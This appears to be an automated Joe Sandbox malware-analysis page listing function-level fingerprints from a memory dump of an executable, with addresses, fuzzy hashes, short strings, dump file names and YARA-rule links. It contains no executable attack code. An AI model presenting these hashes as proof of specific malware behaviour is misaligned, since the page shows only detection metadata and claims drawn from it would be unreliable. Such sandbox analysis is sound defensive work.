Instruction ID: 9d3d3c0cd1490b783fdbc254ec90545c1dc49a2a46b3a9b8fcd5d24eb1153d31
Opcode Fuzzy Hash: 5f74f428007807354c5e064e7b98a79646a7b49637bcd705ac47e58b8f2840c0
Instruction Fuzzy Hash: B9816A1270C142D7EF6C5E2A75E8A7EB6C3AF86744F684938DC0E87BD6C92CE8454E11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645CA980, Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

pH4, xrefs: 00007FF7645CAABB
pH4, xrefs: 00007FF7645CAC29

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: pH4$pH4
API String ID: 0-1794507869
Opcode ID: d4ca92abdd35dc87a66319a3f731d70aba16736b4364a61590b7d0346d6587fb
Instruction ID: eb0270e8ae955ec5d2a42dcec6d68730aea515ab7d564894d9e119bd84e98125
Opcode Fuzzy Hash: d4ca92abdd35dc87a66319a3f731d70aba16736b4364a61590b7d0346d6587fb
Instruction Fuzzy Hash: B4A16C26B0C242D7D6319E2AD9C062BFBA3EB81350F648635E955C77E5CA3CEC458F60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BDFC2, Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

Jz]6, xrefs: 00007FF7645BE087
Jz]6, xrefs: 00007FF7645BE138

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: Jz]6$Jz]6
API String ID: 0-1495602739
Opcode ID: 6a07c786dd2af207a682b533cc5d74da4931a498b339bddfae3c191fa5bb4d7d
Instruction ID: e6d1669bba41a5d6fa70e820cadb4bdefab573214e12f77005bd150f8a85cd6b
Opcode Fuzzy Hash: 6a07c786dd2af207a682b533cc5d74da4931a498b339bddfae3c191fa5bb4d7d
Instruction Fuzzy Hash: 8D416766F04142C6FB2C6F7B60E13BE66929B86398F645039DD2F03FC6CC2D95824B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B468D, Relevance: 1.9, Strings: 1, Instructions: 606COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF7645B4D93

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: 0f80c1449ea0fa9c6a96c7b7519eacae0ad01310e6f046cd670f3a398d321b91
Instruction ID: b38fd464197fcaea2d53afe3fd96bbb44d7b43b917a2aa7de5986a6a6577727d
Opcode Fuzzy Hash: 0f80c1449ea0fa9c6a96c7b7519eacae0ad01310e6f046cd670f3a398d321b91
Instruction Fuzzy Hash: F1320A16A0C6C5D7DA791A2525F037EEBD29FC3340FA940BAC58F07A9BCD1C9C498725

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645E3560, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c360a1e7dfe6c72658459e3ee820b6495c4c21557a7051d9a2b6bb70681d9e94
Instruction ID: ca0f42d82546de5a898b2ead80792323fc4c4b0e8d162ec1d7354f70d07b3152
Opcode Fuzzy Hash: c360a1e7dfe6c72658459e3ee820b6495c4c21557a7051d9a2b6bb70681d9e94
Instruction Fuzzy Hash: A4D16926B0D502C7EB286E3A68D0A7EB6D29FC6314F544139D95E83BF2CE2CD9458A14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C3710, Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245d9c46f7d41a1e6d0eb3a05c93679d6ef352b954ae0cf32af4a90a8195c918
Instruction ID: 0a0a4cfc8ce651afa330aaa2327275c81145b4feaa94a0548ce42fa6f0f2c383
Opcode Fuzzy Hash: 245d9c46f7d41a1e6d0eb3a05c93679d6ef352b954ae0cf32af4a90a8195c918
Instruction Fuzzy Hash: D2E1E77661C649C7E5789E1A90D4139F7A2EBC4790FA4013EDA4E47FE5CE2CE8418F21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B5E40, Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e27d64064907930173d7950059abdc981c81a2b3f6b63498e388086948221ef7
Instruction ID: ba9567580f6f1282d5e65eb4f7a036847ae8797bf6c93e12c5a3bee6cda077a6
Opcode Fuzzy Hash: e27d64064907930173d7950059abdc981c81a2b3f6b63498e388086948221ef7
Instruction Fuzzy Hash: 18D12C25B0C606C6FD78AE1B98E153EE2A1AF40364FA45535E61DC77E2DE2CFC428612

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B124B, Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5152896219a3b162abd2383f7f122f48fd822d137cb0455e239f49132b07ddc
Instruction ID: 7972a7b581f26f8cd04517db6d6c310de87c7406509bf7e17ed7b05756e80ec1
Opcode Fuzzy Hash: b5152896219a3b162abd2383f7f122f48fd822d137cb0455e239f49132b07ddc
Instruction Fuzzy Hash: 2DD15B27B0C142C7EA745F2974E067EFAD2AFC6390FA44235D95A87AE6CD3CD8458B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645BA730, Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f7e6f369cdc0cc978acbe129cfbba3bb5ff3c2fe0ade0a9bff3d755c7cefed
Instruction ID: 542e6ddcbd9bbc5f91be85db27baa31be0aec1a13b627fa509fd63bd567ea386
Opcode Fuzzy Hash: 78f7e6f369cdc0cc978acbe129cfbba3bb5ff3c2fe0ade0a9bff3d755c7cefed
Instruction Fuzzy Hash: F0B12077A0C502D7EA149F29A4D042DB7E3AFD0360FA48631DA28C73E5DA3DEC469B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C1780, Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79776c15fe3340e34aa3f4cadf7d4159aa225b2ab8b2d9de6158afb2556c387d
Instruction ID: 0455d1e2c29982f1d6fe81c54918475012e471dad63343f82f9e0e1f306bf2f2
Opcode Fuzzy Hash: 79776c15fe3340e34aa3f4cadf7d4159aa225b2ab8b2d9de6158afb2556c387d
Instruction Fuzzy Hash: 12B16B66F08145CBFB289E3A58E02BD6AE2AF85784F944539DD1A877D5CE38DD018F30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C1C00, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad67457b5dc25e4ef473cfe60cb3b61a56149aa22765cf15d4c141f40b5f724f
Instruction ID: b7247565a288f62dbbbebda74a2a405c7b53dd6b2def62cd0da9ed1abe453d09
Opcode Fuzzy Hash: ad67457b5dc25e4ef473cfe60cb3b61a56149aa22765cf15d4c141f40b5f724f
Instruction Fuzzy Hash: 2DC1C532618A45C6EB749E1AA4C023EBBA1EB84794F94453AFA4DC7795CE3CD8409F70

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B52B0, Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c1173410c86d8b84a2824e3006717c1beaba27943f54f9205f867e7679ad0c
Instruction ID: 18eeb0c302dfb668d9943995bbfc789c86acbf92f2917f88a164d9efc41cde37
Opcode Fuzzy Hash: b7c1173410c86d8b84a2824e3006717c1beaba27943f54f9205f867e7679ad0c
Instruction Fuzzy Hash: BCC1275270C2DAC7EA3D5D26A4E02BEF6919B82344FE48435DADF93796CD4CDC468B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645CA0A0, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9a26891977e3dbdd595d316eeac1fc8415fb55c2a79e4c84eaf6860d75be96
Instruction ID: 8aa2ea98fbde291f77c48cebab61e293570c36c4cbfc80ef900d27f1d91deeba
Opcode Fuzzy Hash: 2d9a26891977e3dbdd595d316eeac1fc8415fb55c2a79e4c84eaf6860d75be96
Instruction Fuzzy Hash: 10A10E3770C141CB9720DF1AA8C051EBBE1ABC0764B649635E955C77F5CA38EC459F60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C1330, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 401fe282aea40fe0064174eb3a668b8f2b579de043f9ebea719c838a46437037
Instruction ID: 53203126f772bf9f67561b82bfc3140e0862ab1e3f0b6a754ba1f0326cb55f53
Opcode Fuzzy Hash: 401fe282aea40fe0064174eb3a668b8f2b579de043f9ebea719c838a46437037
Instruction Fuzzy Hash: E7919316B0D546C6F9349E2AA5C0039FEA06F41BD4F414239DE6B67BE2DA7CDC418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645C0980, Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170960dbb728563c5f2f192855f1a10dfda583c38b287fd4c5a91214b7848392
Instruction ID: 680bbf7059aa361b0e39b6f1a57ed5e70ee9ee055a62376863cbd95f4ba99454
Opcode Fuzzy Hash: 170960dbb728563c5f2f192855f1a10dfda583c38b287fd4c5a91214b7848392
Instruction Fuzzy Hash: 6B914EA6F0D242C7F6305E6E59C022DF292ABD5B20F948536DA55C73E5CA3CEC458F60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B2F10, Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b0d4861b0ecc72b8ab76a33449d5830e1435e7e8967c285281bd782eb323d4
Instruction ID: 7e19567698caaa7738e2179f86d8aa4dc973d316a80aabfdfbaab5fe306663bb
Opcode Fuzzy Hash: b4b0d4861b0ecc72b8ab76a33449d5830e1435e7e8967c285281bd782eb323d4
Instruction Fuzzy Hash: 8A815B36B1C602C7EA289A2AA8E567DA6D2AFC5354FA44135FD1E83BE5CD3CD8414B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B9460, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7979bfcc72008f24f3ccf85e84de54aeb08b3151a9f486636ece3992e033e661
Instruction ID: 69ad7ed04f6c874c376e1e60690cf75ea8e5a09734b4aa0595777238fd2bdf33
Opcode Fuzzy Hash: 7979bfcc72008f24f3ccf85e84de54aeb08b3151a9f486636ece3992e033e661
Instruction Fuzzy Hash: 4871253B708542CBD6108F2A99C006EB792BBE1725FA4C331DA55877E9CA3DE846DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645FDE50, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1674aaabbf4eec13cd1b55fcc2eebe8c060a15b67066f9e7e9269c9fda084f05
Instruction ID: 4cc620a0bffc45772081758328dbaab725bbc2ce69d12145c86eb64151974bb3
Opcode Fuzzy Hash: 1674aaabbf4eec13cd1b55fcc2eebe8c060a15b67066f9e7e9269c9fda084f05
Instruction Fuzzy Hash: 49818B36D0D103C6E6A1AE2A44C00BEB6E15F603A0FAD4532DE59873E2CA1CEC445BA3

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645CBB70, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9408882d9a27c78032ad0e9cafce49ea86740dc16cbc8d92578be285f99bc4
Instruction ID: b6289177a84716bb438ca894a8f59444a28b21b9aadfd4c576ae434c4c3c37a2
Opcode Fuzzy Hash: ef9408882d9a27c78032ad0e9cafce49ea86740dc16cbc8d92578be285f99bc4
Instruction Fuzzy Hash: 1A613A2670C64ADBD630AE2EB9C053EB6A2ABC0354FE4C535E944C33A5CA7CED055F64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF764604B98, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 24d9fb72b0f8c4d9b802ed231016751df43b91170c7a894116cbb9370917ebac
Instruction ID: 50b39ad83a05a7700b90573bdad76d2019ca34cc241c27a2dbf84ddc909237c7
Opcode Fuzzy Hash: 24d9fb72b0f8c4d9b802ed231016751df43b91170c7a894116cbb9370917ebac
Instruction Fuzzy Hash: 61413622714A58C2EF14DF2BDA98569B3A2EB58FD4B889033EE0D87B58DF3CC5458310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B1000, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e4d3378f11ddf9338ec5b831e83c839087936af87fb9af1790402979aa6d59
Instruction ID: 44a6aeedae58b229b293c76e8bbed128879e48d2bb83503206a3da57082f487a
Opcode Fuzzy Hash: 67e4d3378f11ddf9338ec5b831e83c839087936af87fb9af1790402979aa6d59
Instruction Fuzzy Hash: 9F41E232708B45C2EB509F1AF4A076EABA0EBC5BD0F900035EE8D87BA5DE3DD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7645B9040, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$D<, xrefs: 00007FF7645B9156
$D<, xrefs: 00007FF7645B922F
$D<, xrefs: 00007FF7645B9225

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID:
String ID: $D<$$D<$$D<
API String ID: 0-1696938221
Opcode ID: ddb94afbb721ec7b14d65b13618e9554712962a96ccbbe3d0e67480a278cf4d4
Instruction ID: 40b8c2287b8651a46d32d12e57f5eca35b07730a873aafb86319fe30aa91bcc1
Opcode Fuzzy Hash: ddb94afbb721ec7b14d65b13618e9554712962a96ccbbe3d0e67480a278cf4d4
Instruction Fuzzy Hash: AD712A36B0DA49CBE6205E2AA4E063DF7A2AFD2350FA44131E95D833D5CE3DD842C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF764605EA4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF764605ECD
TlsSetValue.KERNEL32(?,?,00001AFB4450AA70,00007FF7646065B6,?,?,00001AFB4450AA70,00007FF764607DA5,?,?,?,?,00007FF76460C60E,?,?,00000000), ref: 00007FF764605EE4

Strings

FlsSetValue, xrefs: 00007FF764605EBA

Memory Dump Source

Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true

Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: b7ca1fa586fd1b4387c018720e26ca70aafa06f553ecdae497349a26f2a14758
Instruction ID: 9cd634d1dae694f655646aab57091c91cf20f335a8bee5bfa34b7e75a64f0b06
Opcode Fuzzy Hash: b7ca1fa586fd1b4387c018720e26ca70aafa06f553ecdae497349a26f2a14758
Instruction Fuzzy Hash: B9E06561E18646D1FA05AF57E5881B5E233EF48B80FC84036D55E07794CE3CE8948320

Uniqueness

Uniqueness Score: -1.00%

